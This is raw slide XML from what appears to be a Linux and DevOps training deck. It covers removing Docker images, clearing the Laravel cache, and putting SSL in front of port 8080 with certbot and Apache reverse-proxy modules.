          <p:cNvPr id="4585" name="Google Shape;4585;p7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en" sz="2505">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="2505">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2505">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2505">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2505">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> image rmi &lt;imageId&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2505">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2505">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2505">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can't remove an image with a running container</a:t>
            </a:r>
            <a:endParaRPr sz="2505">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1018"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2505">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2505">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>First, we need to stop the running container before removing its associated Image</a:t>
            </a:r>
            <a:endParaRPr sz="2505">
              <a:solidFill>
                <a:srgbClr val="6AA84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96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="633875"/>
            <a:ext cx="8520600" cy="3094500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>How to </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="5600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>create, delete, and modify</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> groups in Linux</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6100">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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9" name="Shape 4589"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4590" name="Google Shape;4590;p74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420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clear Laravel Cache</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4591" name="Google Shape;4591;p74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0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2905">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php artisan cache:clear &amp;&amp; php artisan route:clear &amp;&amp; php artisan config:clear &amp;&amp; php artisan view:clear &amp;&amp; php artisan event:clear &amp;&amp; php artisan clear-compiled</a:t>
            </a:r>
            <a:endParaRPr sz="2905">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2505">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4595"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4596" name="Google Shape;4596;p745"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="215600"/>
            <a:ext cx="8520600" cy="93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420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to install GUI in linux and access via browsers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4597" name="Google Shape;4597;p74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lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2905">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php artisan cache:clear &amp;&amp; php artisan route:clear &amp;&amp; php artisan config:clear &amp;&amp; php artisan view:clear &amp;&amp; php artisan event:clear &amp;&amp; php artisan clear-compiled</a:t>
            </a:r>
            <a:endParaRPr sz="2905">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2505">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 4601"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4602" name="Google Shape;4602;p746"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="215600"/>
            <a:ext cx="8520600" cy="93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420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to setup SSL for port 8080</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4603" name="Google Shape;4603;p7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018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1904" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://anil29aug2024.vishalmahawar.shop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1904">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -&gt; http://45.136.17.143:8080/</a:t>
            </a:r>
            <a:endParaRPr sz="1505">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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7" name="Shape 4607"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4608" name="Google Shape;4608;p747"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="159850"/>
            <a:ext cx="8520600" cy="77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How to setup SSL for port 8080</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4609" name="Google Shape;4609;p747"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599500" y="938950"/>
            <a:ext cx="8323800" cy="3825900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-343217" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPts val="1805"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt update</a:t>
            </a:r>
            <a:endParaRPr sz="1804">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-343217" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPts val="1805"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt install certbot python3-certbot-apache</a:t>
            </a:r>
            <a:endParaRPr sz="1804">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-343217" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPts val="1805"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo a2enmod ssl</a:t>
            </a:r>
            <a:endParaRPr sz="1804">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-343217" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPts val="1805"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo a2enmod proxy</a:t>
            </a:r>
            <a:endParaRPr sz="1804">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-343217" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPts val="1805"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo a2enmod proxy_http</a:t>
            </a:r>
            <a:endParaRPr sz="1804">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-343217" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPts val="1805"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo a2enmod rewrite</a:t>
            </a:r>
            <a:endParaRPr sz="1804">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-343217" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPts val="1805"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemctl restart apache2</a:t>
            </a:r>
            <a:endParaRPr sz="1804">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-343217" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPts val="1805"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo nano /etc/apache2/sites-available/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anil29aug2024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-ssl.conf</a:t>
            </a:r>
            <a:endParaRPr sz="1804">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-343217" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPts val="1805"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo a2ensite anil29aug2024-ssl.conf</a:t>
            </a:r>
            <a:endParaRPr sz="1804">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-343217" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPts val="1805"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo certbot --apache</a:t>
            </a:r>
            <a:endParaRPr sz="1804">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-343217" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPts val="1805"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo systemctl restart apache2</a:t>
            </a:r>
            <a:endParaRPr sz="1804">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-343217" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPts val="1805"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1804">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check on http://anil29aug2024.vishalmahawar.shop/</a:t>
            </a:r>
            <a:endParaRPr sz="1804">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 4613"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4614" name="Google Shape;4614;p748"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256000" y="956350"/>
            <a:ext cx="8602200" cy="283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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> apache2/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site-available/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>					subdomain.example.com.conf</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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8" name="Shape 4618"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4619" name="Google Shape;4619;p749"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237450" y="132050"/>
            <a:ext cx="8520600" cy="477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800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
